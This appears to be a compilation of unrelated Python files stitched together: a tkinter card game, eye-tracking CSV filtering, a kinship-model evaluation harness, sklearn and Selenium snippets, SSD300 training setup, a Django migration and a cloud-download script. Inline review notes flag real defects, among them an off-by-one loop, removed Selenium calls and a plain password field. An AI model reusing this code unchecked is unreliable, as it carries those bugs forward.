        self.master.battle.on_battle = on_battle
        self.master.battle.on_turn_finished = on_turn_finished
        self.master.battle.on_turn_par = on_turn_par
        self.master.battle.on_player_picked_card = on_player_picked_card
        self.master.battle.on_game_ended = on_game_ended
        self.master.battle.on_game_won = on_game_won
        self.master.battle.on_game_par = on_game_par
        self.nb_players = len(self.players)
        for i in range(self.nb_players):
            self._players_names[i]['text'] = self.players[i] + (' (moi)' if (i == 0) else '')
        self.new_turn()
        self.refresh_scores()

    # ===== HELPER FUNCTIONS =====
    def refresh_scores(self):
        """Refresh every player's point label."""
        my_points = self.master.battle.my_points()
        others_points = self.master.battle.others_points()
        for i in range(0, self.nb_players):
            self._scores[i]['text'] = "{} : {} pts".format(self.players[i], my_points if (i == 0) else others_points[self.players[i]])

    def update_card_img(self, index, new_img):
        """Show *new_img* on card slot *index* and raise it above siblings."""
        card = self._cards[index]
        card.image = new_img
        card.config(image=new_img)
        card.lift()

    def drag_card(self, evt):
        """Mouse-drag handler: move a card label under the pointer whenever
        the current interaction flags allow grabbing it."""
        def dragging(card):
            x, y = self.winfo_pointerx() - self.master.winfo_rootx(), self.winfo_pointery() - self.master.winfo_rooty()
            card.place(x=x, y=y, relx=0, rely=0, anchor=CENTER)
            card.lift()
            return
        if self.can_draw and not self.game_ended:
            if evt.widget == self._top_card:
                dragging(evt.widget)
        if self.can_pick_mine:
            index = self._cards.index(evt.widget)
            # Only my own column (column 0) may be picked after a tie.
            if index % 4 == 0:
                dragging(evt.widget)
        if self.can_pick_all:
            if evt.widget in self._cards:
                dragging(evt.widget)

    def card_drawed(self, evt):
        """Release on the deck's top card: draw a card."""
        if self.can_draw:
            # During a battle we may draw again; otherwise drawing ends.
            self.can_draw = self.in_battle
            self.master.battle.draw_card()
            if self.in_battle:
                self.replace_top_card()
            else:
                self.hide_top_card()

    def card_picked(self, evt):
        """Release on a sheet card: pick it up when allowed."""
        if self.can_pick_all:
            self.master.battle.pick_card(evt.widget.card)
            self.replace_card_in_sheet(evt.widget)
        if self.can_pick_mine:
            index = self._cards.index(evt.widget)
            # Only my own column (column 0) may be picked after a tie.
            if index % 4 == 0:
                self.master.battle.pick_card(evt.widget.card)
                self.replace_card_in_sheet(evt.widget)

    def new_turn(self):
        """Reset flags and labels for a fresh turn."""
        self.can_draw = True
        self.can_pick_all = False
        self.can_pick_mine = False
        self.in_battle = False
        for i in range(self.nb_players):
            self._messages[i]['text'] = ''
        self.update_card_img(0, ImageFactory.instance.get_border())
        self.replace_top_card()

    def replace_card_in_sheet(self, card):
        """Put a dragged card label back on its sheet slot and show the card
        on the discard pile (unless the turn was a tie)."""
        if not self.on_par:
            self._defausse.image = ImageFactory.instance.get(card.card)
            self._defausse.config(image=self._defausse.image)
        i = self._cards.index(card)
        x, y = self._coords_x[i % 4], self._coords_y[1] + int(i / 4) * 20
        card.place(x=x, y=y, anchor=NW)
        card.image = None
        card.lower()

    def replace_top_card(self):
        """Show the deck's top card again (unless the game is over)."""
        if self.game_ended:
            self.hide_top_card()
        else:
            self._top_card.place(relx=0.25, rely=1, x=0, y=0, anchor=CENTER)

    def hide_top_card(self):
        """Anchor the top card below the visible area."""
        self._top_card.place(relx=0.25, rely=1, x=0, y=0, anchor=N)
import rlp
from eth2.beacon.sedes import (
uint24,
uint64,
)
from eth2.beacon.typing import (
SlotNumber,
ShardNumber,
ValidatorIndex,
)
class ShardReassignmentRecord(rlp.Serializable):
    """
    Record describing a validator's reassignment to a shard at a given slot.

    Note: using RLP until we have standardized serialization format.
    """
    fields = [
        # Which validator to reassign
        ('validator_index', uint24),
        # To which shard
        ('shard', uint64),
        # When
        ('slot', uint64),
    ]

    def __init__(self,
                 validator_index: ValidatorIndex,
                 shard: ShardNumber,
                 slot: SlotNumber) -> None:
        # Delegate field assignment/validation to rlp.Serializable.
        super().__init__(
            validator_index=validator_index,
            shard=shard,
            slot=slot,
        )
|
import os
import numpy as np
# collecting all csv files from forwarded directory
def collect_csv_data_collection_from_directory(path):
    """Load every file in *path* as a pandas DataFrame; return them as a list."""
    import pandas as pd
    import os
    # NOTE(review): os.listdir order is arbitrary; sort the names if a
    # stable ordering ever matters downstream.
    return [pd.read_csv(os.path.join(path, csv_name))
            for csv_name in os.listdir(path)]
# filtering collected data
def filter_collected_data(data_collection):
    """Reduce each recording to (TIME, AOI) rows, drop NaN padding and merge
    successive rows that share the same AOI label."""
    filtered_important_data_collection = []
    for data in data_collection:
        # Keep only the important columns as a raw value array.
        rows = data[['TIME', 'AOI']].values
        rows_without_nan = clear_nan_values(rows)
        merged_once = concatenate_rows_with_same_successive_aoi(rows_without_nan)
        # A second merge pass is needed: the first pass removes AOIs viewed
        # for less than 200 ms, which can create fresh runs of identical
        # successive AOI labels.
        merged_twice = concatenate_rows_adding_time_with_same_successive_aoi(merged_once)
        filtered_important_data_collection.append(merged_twice)
    return filtered_important_data_collection
# clearing NaN values from the begin and the end of data sequence
def clear_nan_values(data):
    """Strip NaN AOI rows from both ends of a (time, aoi) sequence and
    replace interior NaN rows with the placeholder label "prazno".

    Assumes AOI labels are strings and missing values are float NaN —
    isinstance(row[1], float) is therefore used as the NaN test; TODO confirm.
    """
    # clearing Nan values from front of the data sequence
    found_first_aoi = False
    data_cleared_from_front = []
    # NOTE(review): indentation reconstructed — the else is taken to belong
    # to the isinstance() test (non-NaN rows mark the first AOI); confirm.
    for row in data:
        if isinstance(row[1], float):
            # NaN before the first real AOI is dropped; afterwards it is
            # kept as the placeholder "prazno".
            if found_first_aoi:
                data_cleared_from_front.append(([row[0], "prazno"]))
        else:
            found_first_aoi = True
            data_cleared_from_front.append(([row[0], row[1]]))
    # clearing NaN values from the end of the sequence
    found_last_aoi = False
    reversed_cleared_data = []
    # NOTE(review): range stops at index 1, so element 0 of the
    # front-cleared data never reaches the output — looks like an
    # off-by-one (stop should probably be -1); confirm before fixing.
    for i in range(len(data_cleared_from_front) - 1, 0, -1):
        if isinstance(data_cleared_from_front[i][1], float):
            # NOTE(review): unlike the front pass, interior NaNs here are
            # kept with their original value rather than "prazno" — confirm
            # whether this asymmetry is intended.
            if found_last_aoi:
                reversed_cleared_data.append(([data_cleared_from_front[i][0], data_cleared_from_front[i][1]]))
        else:
            found_last_aoi = True
            reversed_cleared_data.append(([data_cleared_from_front[i][0], data_cleared_from_front[i][1]]))
    cleared_data = list(reversed(reversed_cleared_data))
    return cleared_data
# concatenating time spent on successive AOI fields in data sequence and removing ones with time spent less than 200ms
def concatenate_rows_with_same_successive_aoi(data):
    """Collapse runs of identical successive AOI labels into single rows of
    (time spent, aoi), dropping runs shorter than 200 ms.

    Assumes timestamps in row[0] are in seconds (the 0.20 threshold);
    TODO confirm the unit.
    """
    import numpy as np
    concatenated_data = []
    current_aoi = ''
    aoi_first_time_seen = 0.0
    for row in data:
        if current_aoi == row[1]:
            # Same AOI run continues; nothing to flush yet.
            continue
        else:
            # Clearing rows which have time spent on less than 200ms.
            # NOTE(review): the first flushed row carries the initial empty
            # label '' when the first AOI lasted over 200 ms — confirm this
            # placeholder row is intended.
            if row[0] - aoi_first_time_seen > 0.20:
                concatenated_data.append([row[0] - aoi_first_time_seen, current_aoi])
            current_aoi = row[1]
            aoi_first_time_seen = row[0]
    # last AOI that is left to append to sequence (no 200 ms filter here).
    concatenated_data.append([data[len(data) - 1][0] - aoi_first_time_seen, current_aoi])
    return concatenated_data
# concatenating time spent on successive AOI fields (based on adding time between them, not calculating time spent)
# in data sequence
def concatenate_rows_adding_time_with_same_successive_aoi(data):
    """Merge runs of identical successive AOI labels by summing their times.

    Returns a numpy array of [time, aoi] rows (values become strings because
    the array mixes floats and labels). The first emitted row is the
    placeholder for the initial empty label, matching the original output.
    """
    import numpy as np
    merged = []
    label = ''
    elapsed = 0.0
    for entry in data:
        if label == entry[1]:
            # Same AOI as the current run: accumulate its time.
            elapsed += entry[0]
        else:
            # New AOI: flush the finished run, then start a new one.
            merged.append([elapsed, label])
            label = entry[1]
            elapsed = entry[0]
    # Flush the final run.
    merged.append([elapsed, label])
    return np.array(merged)
# saving csv files into forwarded path
def save_data_as_csv(data, path):
    """Write the rows of `data` to `<path>.csv`.

    Fixed: the file is opened with ``newline=""`` as the csv module
    requires (otherwise blank lines appear between rows on Windows), and
    the pointless single-argument ``os.path.join(path + ".csv")`` was
    replaced by plain concatenation.
    """
    import csv
    filename = path + ".csv"
    with open(filename, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerows(data)
# MAIN
# Script entry: load every CSV under ../collected_data, run the filtering
# pipeline defined above, and write one numbered CSV per recording into
# ../filtered_colected_data (directory name keeps the original typo).
collected_data = collect_csv_data_collection_from_directory("../collected_data")
filtered_data = filter_collected_data(collected_data)
for i in range(0, len(filtered_data)):
    save_data_as_csv(filtered_data[i],
                     "../filtered_colected_data/" + str(i))
|
import pandas as pd
import seaborn as sn
import matplotlib.pyplot as plt
from utils.loader import *
import numpy as np
from sklearn.metrics import confusion_matrix
from sklearn.metrics import f1_score,fbeta_score
# from models import joint_cnn
from utils.transform import test_transform
from models.modules import JLNet
from functools import partial
class test(object):
    """Evaluation harness for kinship identification/verification models.

    Wraps a model class (`modNet`) and a dataset-loader class (`dloader`)
    and evaluates checkpointed models over KinFaceW-style folds.
    """
    def __init__(self, modNet, dloader):
        # Run on GPU 0 when available, otherwise CPU.
        self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
        self.dloader = dloader
        self.Net = modNet()
    def ki_test(self, ckpth, list_path, img_root, test_id, test_batch, ntype='', real_sn=False,test_each=False):
        """
        kinship identification test

        Loads the checkpoint at `ckpth`, runs inference over the fold(s)
        in `test_id`, and returns averaged metrics.  Return arity depends
        on the flags:
        - real_sn=True: (confusion, f10_fd, f10_fs, f10_md, f10_ms, macro_f10, acc)
        - otherwise:    (confusion, f1, acc)
        :return:
        """
        self.Net.load(ckpth)
        # Bind the network type once so the loop below can call self.infer(images).
        self.infer = partial(self.Net.inference,net_type=ntype)
        test_set = self.dloader(list_path, img_root, test_id, transform=test_transform, test=True, test_each=test_each,real_sn = real_sn)
        test_loader = DataLoader(test_set, batch_size=test_batch)
        total_pred = []
        total_label=[]
        self.Net.net.eval()
        with torch.no_grad():
            for data in test_loader:
                images, labels, _, _ = data
                images, labels = images.to(self.device), labels.to(self.device)
                if ntype =='cascade':
                    # Cascade mode returns hard class predictions directly.
                    predicted = self.infer(images)
                else:
                    # Otherwise take the argmax over the class outputs.
                    outputs = self.infer(images)
                    _, predicted = torch.max(outputs.data, 1)
                predicted = predicted.cpu().data.numpy()
                labels = labels.cpu().data.numpy()
                total_pred = np.concatenate((total_pred, predicted), axis=0)
                total_label = np.concatenate((total_label, labels), axis=0)
        if real_sn:
            # Per-class F-beta (beta=10 weights recall heavily) for the four
            # kin relations: 1=FD, 2=FS, 3=MD, 4=MS.
            confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
            f10_fd = fbeta_score(total_label, total_pred, labels=[1], beta=10, average='macro')
            f10_fs = fbeta_score(total_label, total_pred, labels=[2], beta=10, average='macro')
            f10_md = fbeta_score(total_label, total_pred, labels=[3], beta=10, average='macro')
            f10_ms = fbeta_score(total_label, total_pred, labels=[4], beta=10, average='macro')
            # NOTE(review): named "micro_f1" but computed with average='macro'.
            micro_f1 = fbeta_score(total_label, total_pred, beta=10, average='macro')
            acc = sum(total_label == total_pred) / len(total_label)
            return confu_m, f10_fd, f10_fs, f10_md, f10_ms, micro_f1, acc
        else:
            if test_each:
                # Per-relation (binary) evaluation.
                confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
                micro_f1 = f1_score(total_label, total_pred)
                acc = sum(total_label == total_pred) / len(total_label)
                return confu_m, micro_f1, acc
            else:
                confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
                micro_f1 = f1_score(total_label, total_pred, average='macro')
                acc = sum(total_label == total_pred) / len(total_label)
                return confu_m, micro_f1, acc
    def cv_ki(self,ckp_pth,train_ls,data_pth,savename,test_batch,n_type='',real_sn = False,test_each=False):
        """
        cross validation kinship identification

        Runs ki_test once per checkpoint directory under `ckp_pth` (one
        per fold), averages the metrics, prints them, and saves a
        confusion heat-map image named from `savename`.
        :param ckp_pth:
        :param train_ls:
        :param data_pth:
        :param savename:
        :return:
        """
        divnum = len(os.listdir(ckp_pth))
        if real_sn:
            con_avg = 0
            f10 = 0
            f10_fd_all = 0
            f10_fs_all = 0
            f10_md_all = 0
            f10_ms_all = 0
            avg_acc = 0
            for i, ld in enumerate(sorted(os.listdir(ckp_pth))):
                ld = os.path.join(ckp_pth, ld)
                # Checkpoint i is evaluated on fold 5-i.
                confu_norm, f10_fd, f10_fs, f10_md, f10_ms, micro_f1, acc =self.ki_test(ckpth=ld,list_path=train_ls,
                                                                                       img_root=data_pth,test_id=[5-i],
                                                                                       test_batch=test_batch, ntype=n_type,
                                                                                       real_sn= real_sn,test_each=test_each)
                con_avg = confu_norm + con_avg
                f10_fd_all += f10_fd
                f10_fs_all += f10_fs
                f10_md_all += f10_md
                f10_ms_all += f10_ms
                f10 += micro_f1
                avg_acc += acc
            # NOTE(review): this branch divides by a hard-coded 5 while the
            # else-branch divides by divnum — confirm there are always 5 folds.
            con_avg = con_avg / 5
            f10 = f10 / 5
            f10_fd_all /= 5
            f10_fs_all /= 5
            f10_md_all /= 5
            f10_ms_all /= 5
            avg_acc = avg_acc / 5
            f10_4avg = (f10_fd_all + f10_fs_all + f10_md_all + f10_ms_all) / 4
            print(con_avg)
            print('f10_fd:{}'.format(f10_fd_all))
            print('f10_fs:{}'.format(f10_fs_all))
            print('f10_md:{}'.format(f10_md_all))
            print('f10_ms:{}'.format(f10_ms_all))
            print('avg:{}'.format(f10_4avg))
            print('average_macro_f1:{}'.format(f10))
            print('avg acc:{:04}'.format(avg_acc))
            plt.figure()
            df_cm = pd.DataFrame(con_avg, ['F-D', 'F-S', 'M-D', 'M-S'], ['F-D', 'F-S', 'M-D', 'M-S'])
            sn.set(font_scale=0.8)  # for label size
            sn.heatmap(df_cm, vmin=0, vmax=1, cmap='Blues', annot=True, annot_kws={"size": 16})  # font size
            # plt.show()
            # NOTE(review): `test_data` is a module-level global defined in
            # the __main__ block — this method breaks if imported elsewhere.
            plt.savefig('{}-kfw-{}-combine-hm.png'.format(savename, test_data))
        else:
            con_avg = 0
            mf1 = 0
            avg_acc = 0
            for i, ld in enumerate(sorted(os.listdir(ckp_pth))):
                ld = os.path.join(ckp_pth, ld)
                confu_norm, micro_f1, acc = self.ki_test(ckpth=ld,list_path=train_ls,
                                                         img_root=data_pth,test_id=[5-i],
                                                         test_batch=test_batch, ntype=n_type,real_sn= real_sn,test_each=test_each)
                con_avg = confu_norm + con_avg
                mf1 += micro_f1
                avg_acc += acc
            con_avg = con_avg / divnum
            mf1 = mf1 / divnum
            avg_acc = avg_acc / divnum
            print(con_avg)
            print('average_macro_f1:{}'.format(mf1))
            print('average multiclass acc:{:04}'.format(avg_acc))
            plt.figure()
            # df_cm = pd.DataFrame(con_avg, ['No-kin', 'F-D', 'F-S', 'M-D', 'M-S'], ['No-kin', 'F-D', 'F-S', 'M-D', 'M-S'])
            df_cm = pd.DataFrame(con_avg, ['F-D', 'F-S', 'M-D', 'M-S'], ['F-D', 'F-S', 'M-D', 'M-S'])
            sn.set(font_scale=0.8)  # for label size
            sn.heatmap(df_cm, vmin=0, vmax=1, cmap='Blues', annot=True, annot_kws={"size": 16})  # font size
            # plt.show()
            # plt.savefig('stage3-{}_test1{}_hm{}.png'.format(number,stage3_joint_config.kin_config.model_name, '_avg'))
            plt.savefig('{}-kfw-{}-hm.png'.format(savename,test_data))
if __name__ == '__main__':
    # Which KinFaceW release to evaluate: 'I' or 'II'.
    test_data = 'I'
    # Pair lists (.mat) for the four kin relations: FD, FS, MD, MS.
    train_ls = ['/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/fd_pairs.mat'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/fs_pairs.mat'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/md_pairs.mat'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/ms_pairs.mat'.format(test_data)]
    # Image roots matching the four pair lists above, in the same order.
    data_pth = ['/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/father-dau'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/father-son'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/mother-dau'.format(test_data),
                '/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/mother-son'.format(test_data)]
    # ckp_1 = '/home/wei/Documents/CODE/kinship/data/checkpoints/kfw1_stage3_13/stage3-join_atten7_fix'
    # ckp_2 = '/home/wei/Documents/CODE/kinship/data/checkpoints-kfw2/kfw2_stage3_5/stage3-join_atten7_fix'
    # NOTE(review): machine-specific absolute paths — parameterize before reuse.
    ckp_1 = '/home/wei/Documents/CODE/ECCV/eccv/data/checkpoints/final/pin1-join_atten7_fix'
    ckp_2 = '/home/wei/Documents/CODE/ECCV/eccv/data/checkpoints/final/ww2-join_atten7_fix'
    ckp_dict = {'I': ckp_1, 'II': ckp_2}
    ckp_pth = ckp_dict[test_data]
    # kinship verification: one binary run per relation type.
    testmode = test(JLNet, KinDataset_condufusion2)
    print('test fd')
    testmode.cv_ki(ckp_pth, train_ls[0], data_pth[0], 'fd', test_batch=100, n_type='fd', real_sn=False, test_each = True)
    print('test fs')
    testmode.cv_ki(ckp_pth, train_ls[1], data_pth[1], 'fs', test_batch=100, n_type='fs', real_sn=False, test_each=True)
    print('test md')
    testmode.cv_ki(ckp_pth, train_ls[2], data_pth[2], 'md', test_batch=100, n_type='md', real_sn=False, test_each=True)
    print('test ms')
    testmode.cv_ki(ckp_pth, train_ls[3], data_pth[3], 'ms', test_batch=100, n_type='ms', real_sn=False, test_each=True)
    # kinship identification: multi-class over all four lists at once.
    testmode = test(JLNet,KinDataset_condufusion2)
    testmode.cv_ki(ckp_pth,train_ls,data_pth,'try',test_batch=1000,n_type='cascade',real_sn=False)
|
# Tuples: immutable sequences — like lists whose contents can never change.
sample = ("Hello", 4, 4.4)
print(sample)       # prints the whole tuple
print(sample[-1])   # negative index: last element
|
'''
Created on 8 de dez de 2016
@author: vagnerpraia
'''
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.model_selection import cross_val_score
'''
classifiers = [
KNeighborsClassifier(3),
SVC(kernel="linear", C=0.025),
SVC(gamma=2, C=1),
GaussianProcessClassifier(1.0 * RBF(1.0), warm_start=True),
DecisionTreeClassifier(max_depth=5),
RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),
MLPClassifier(alpha=1),
AdaBoostClassifier(),
GaussianNB(),
QuadraticDiscriminantAnalysis()]
'''
def prepare_data(data, target):
    """Split (data, target) into train/test sets: 70/30 with a fixed seed of 0."""
    split = train_test_split(data, target, test_size=0.3, random_state=0)
    return split
def execute(model, data, target):
    """Fit `model` on a 70/30 split, print holdout metrics and 10-fold CV scores.

    Fixed: ``print predicted[0:5]`` was Python-2 statement syntax — a
    SyntaxError under Python 3 — and is now a function call.
    """
    data_train, data_test, target_train, target_test = prepare_data(data, target)
    model.fit(data_train, target_train.values.ravel())
    predicted = model.predict(data_test)
    print(predicted[0:5])
    expected = target_test
    print(model)
    print('')
    # Accuracy on the 30% holdout split.
    scores = model.score(data_test, target_test)
    print(scores)
    print('')
    print(metrics.classification_report(expected, predicted))
    print('')
    # 10-fold cross-validation over the full data set.
    scores = cross_val_score(model, data, target.values.ravel(), cv=10)
    print(scores)
    print('')
def execute_logistic_regression(data, target):
    """Train and evaluate a logistic-regression classifier."""
    execute(LogisticRegression(), data, target)
def execute_gaussian_nb(data, target):
    """Train and evaluate a Gaussian naive-Bayes classifier."""
    execute(GaussianNB(), data, target)
def execute_k_neighbors_classifier(data, target):
    """Train and evaluate a k-nearest-neighbours classifier."""
    execute(KNeighborsClassifier(), data, target)
def execute_decision_tree_classifier(data, target):
    """Train and evaluate a decision-tree classifier."""
    execute(DecisionTreeClassifier(), data, target)
def execute_svc(data, target):
    """Train and evaluate a support-vector classifier."""
    execute(SVC(), data, target)
def execute_ada_boost_classifier(data, target):
    """Train and evaluate an AdaBoost classifier."""
    execute(AdaBoostClassifier(), data, target)
def execute_random_forest_classifier(data, target):
    """Train and evaluate a small random forest (depth 5, 10 trees, 1 feature per split)."""
    execute(RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1), data, target)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# time: 2020-8-9 23:11:00
# version: 1.0
# __author__: zhilong
# Smoke test: search python.org for "pycon" in Firefox and verify results.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver = webdriver.Firefox()
driver.get('http://www.python.org')
assert 'Python' in driver.title
# NOTE(review): find_element_by_name was removed in Selenium 4 — current
# versions need driver.find_element(By.NAME, 'q'); confirm the pinned version.
elem = driver.find_element_by_name('q')
elem.clear()
elem.send_keys('pycon')
# Submit the search box with Enter.
elem.send_keys(Keys.RETURN)
# The results page shows "No results found." when the search fails.
assert 'no results found.' not in driver.page_source
driver.close()
'''
https://en.wikipedia.org/wiki/Benford's_law
'''
import matplotlib.pyplot as plt
import numpy
def chart_data():
    """Return (digit, probability) pairs per Benford's law for digits 1-9."""
    pairs = []
    for digit in range(1, 10):
        pairs.append((digit, numpy.log10((digit + 1) / digit)))
    return pairs
def main():
    """Draw a vertical bar for each digit's Benford probability and show it."""
    for digit, probability in chart_data():
        plt.plot([digit, digit], [0, probability])
    plt.ylabel('probability')
    plt.xlabel('digit')
    plt.show()
# Run the demo only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
# !/usr/bin/env python
# -*-coding:utf-8 -*-
# Author: Renkai
import json
import requests
def readJson():
    """Read one.json from the working directory and return it as a Python object.

    Fixed: the file handle was opened and never closed; a ``with`` block
    now guarantees it is released.
    """
    with open('one.json', 'r') as f:
        return json.load(f)
# Dump the "request" field of the first item in one.json.
# NOTE(review): runs unconditionally at import time and fails if one.json is
# absent — consider guarding with `if __name__ == '__main__':`.
print(readJson()['item'][0]['request'])
def one_get():
    """Placeholder GET helper — returns the decoded JSON body of a request."""
    # NOTE(review): method and url are empty strings, so requests raises as
    # written; fill them in (e.g. method='GET', url=...) before calling.
    r = requests.request(method='',url='')
    return r.json()
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as Data
from model_ssd300 import SSD300
from datasets import PascalVOCDataset
def create_label_map():
    """Build the Pascal VOC label map.

    Returns the tuple of 20 class names plus a dict mapping each name to an
    integer id (1-20), with 'background' mapped to 0.
    """
    voc_labels = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable','dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor')
    label_map = {name: index + 1 for index, name in enumerate(voc_labels)}
    label_map['background'] = 0
    return voc_labels, label_map
# Data parameters
data_folder='./'
keep_difficult=True
## Model parameters
# Number of classes (20 VOC classes + background)
_,label_map=create_label_map()
n_classes=len(label_map)
# Device
device=torch.device("cuda" if torch.cuda.is_available() else "cpu")
## Learning parameters
# Path to a model checkpoint (None = train from scratch)
checkpoint=None
#batch_size
batch_size=8
# Number of training iterations
iterations=120000
# Data-loading worker processes (apparently must be 0 on Windows)
#workers=4
workers=0
# Print training status every this many batches
print_freq=200
# Learning rate
lr=1e-3
# Decay the learning rate after these iterations
decay_lr_at=[80000,100000]
# Factor the learning rate is decayed by
decay_lr_to=0.1
# Momentum
momentum=0.9
# Weight decay
weight_decay=5e-4
# Clip gradients when they explode, especially with larger batch sizes
grad_clip=None
#...???...
# cudnn.benchmark=True
def main():
    """
    Train the SSD300 model (set-up portion: model, optimizer, data loader).
    """
    global start_epoch,label_map,epoch,checkpoint,decay_lr_at
    # Initialize the model, or load a checkpoint to resume training.
    if checkpoint is None:
        start_epoch=0
        # Fresh model.
        model=SSD300(n_classes=n_classes)
        # Build the optimizer; biases get twice the base learning rate.
        biases=list()
        not_biases=list()
        for param_name,param in model.named_parameters():  # inspect parameters
            if param.requires_grad:
                # Separate bias and weight parameters.
                if param_name.endswith('.bias'):
                    biases.append(param)
                else:
                    not_biases.append(param)
        # Different learning rates for the two parameter groups.
        optimizer=torch.optim.SGD(params=[{'params':biases,'lr':2*lr},{'params':not_biases}],lr=lr,momentum=momentum,weight_decay=weight_decay)
    else:
        # Resume training from the saved checkpoint.
        checkpoint=torch.load(checkpoint,map_location='cpu')  # map to CPU since CUDA may be unavailable
        start_epoch=checkpoint['epoch']+1
        print('\nLoaded checkpoint from epoch %d.\n'%start_epoch)
        model=checkpoint['model']
        optimizer=checkpoint['optimizer']
    # Move to the default device.
    model=model.to(device)
    # criterion=MultiBosLoss()
    # Create the dataloaders.
    #data_folder='./'
    # train_dataset=PascalVOCDataset(data_folder,split='train',keep_difficult=keep_difficult)
    # Difficult samples are not kept (uses the dataset's default False).
    train_dataset=PascalVOCDataset(data_folder,split='train')
    train_loader=Data.DataLoader(train_dataset,batch_size=batch_size,shuffle=True,collate_fn=train_dataset.collate_fn,num_workers=workers,pin_memory=True)
# Kick off training when run as a script.
if __name__=='__main__':
    main()
|
# Generated by Django 2.0.7 on 2018-07-20 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration creating the `Home` and `User` tables."""

    dependencies = [
        ('life', '0002_auto_20180718_1558'),
    ]
    operations = [
        migrations.CreateModel(
            name='Home',
            fields=[
                ('address', models.CharField(max_length=50, primary_key=True, serialize=False)),
                # NOTE(review): max_length has no effect on IntegerField —
                # Django honors it only for char-like fields; confirm intent.
                ('price', models.IntegerField(max_length=20)),
                ('landlord', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('username', models.CharField(max_length=30, primary_key=True, serialize=False)),
                # NOTE(review): password stored as a plain CharField —
                # presumably hashed before saving; verify against the app code.
                ('password', models.CharField(max_length=50)),
                ('name', models.CharField(max_length=100)),
                ('photo', models.CharField(max_length=500)),
                ('hometown', models.CharField(max_length=30)),
            ],
        ),
    ]
|
"""
A script to download a cloud directory to a local directory.
"""
import argparse
import os
import logging
import sync_drives.sync as sync
import providers.provider_list as provider_list
from common.basic_utils import check_for_user_quit
def main(args):
    """Download a remote store directory to a local path.

    `args` comes from the argparse parser below and carries: provider,
    user, local_store_path, remote_store_path, cpath.
    """
    logging.basicConfig(level=logging.INFO)
    # Init provider metadata
    provider_list.init_providers()
    # Check that any initial authentication has been done:
    if sync.required_config_is_present(args.provider, args.cpath, args.user) is False:
        print('It doesn\'t appear you have completed the required authentication '
              'step for {}'.format(args.provider))
        return
    print('==============================================================')
    print("Preparing to download - press \'q\' then enter to stop the download.")
    print('')
    # download_store yields periodically so we can poll for a user quit.
    for res in sync.download_store(args.remote_store_path,
                                   args.provider,
                                   args.local_store_path,
                                   args.user,
                                   args.cpath,
                                   ''):
        if check_for_user_quit() is True:
            break
    print('==============================================================')
    print('')
if __name__ == '__main__':
    # Build the CLI. Fixed two user-facing string defects: the "Dowloads"
    # typo in the description, and a missing space in the --cpath help text
    # (adjacent string literals concatenate, so it read "authenticationconfig").
    parser = argparse.ArgumentParser(description=
                                     'Downloads the specified directory on the cloud server to a local location.')
    parser.add_argument('provider', type=str, choices=provider_list.get_supported_provider_names(),
                        help='The name of the cloud drive provider.')
    parser.add_argument('user', type=str,
                        help='The account name that identifies you to the drive provider.')
    parser.add_argument('local_store_path', type=str,
                        help='The full path to the local store root directory.')
    parser.add_argument('remote_store_path', type=str,
                        help='The full path to the remote store root directory (relative to the drive root).')
    parser.add_argument('--cpath', type=str, default=os.getcwd(),
                        help='The full path to the directory that stores cloud-backup authentication '
                             'config files.')
    main(parser.parse_args())
# Copyright (c) 2011, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
from util import debug
from ast import NodeVisitor
from builtin import builtins
class Children(NodeVisitor):
    """
    An AST visitor to determine the children of each procedure.

    A "child" of procedure P is any procedure or mobile builtin that P
    calls, directly or (after build()) transitively.
    """
    def __init__(self, sig, _debug=False):
        self.debug = _debug
        # Name of the procedure definition currently being visited.
        self.parent = None
        # Mapping: procedure name -> list of names it calls.
        self.children = {}
        debug(self.debug, 'Initialising:')
        for x in sig.mobile_proc_names:
            debug(self.debug, ' '+x)
            self.children[x] = []
    def add_child(self, name):
        """
        Add a child procedure call of the program:
        - omit non-mobile builtins
        - add only if it hasn't been already
        - don't add if it is its parent (recursive)
        """
        # NOTE(review): on Python 3 `filter` returns a lazy iterator; it is
        # rebuilt on each call, so the membership test still works (if slowly).
        if ((not name in self.children[self.parent]) and name != self.parent
                and not name in filter(lambda x: not builtins[x].mobile, builtins.keys())):
            self.children[self.parent].append(name)
            debug(self.debug, ' added child '+name+' to '+self.parent)
    def build(self):
        """
        Given immediate child relationships, calculate all nested relationships.

        Transitive closure by repeated propagation until a fixed point.
        """
        change = True
        # While there are still changes
        while change:
            change = False
            # For each procedure x
            for x in self.children.keys():
                # For each child call y of x
                for y in self.children[x]:
                    # for each child z of call y, or grandchild of x
                    for z in self.children[y]:
                        # Add it if it hasn't already been
                        if not z in self.children[x] and x != z:
                            self.children[x].append(z)
                            change = True
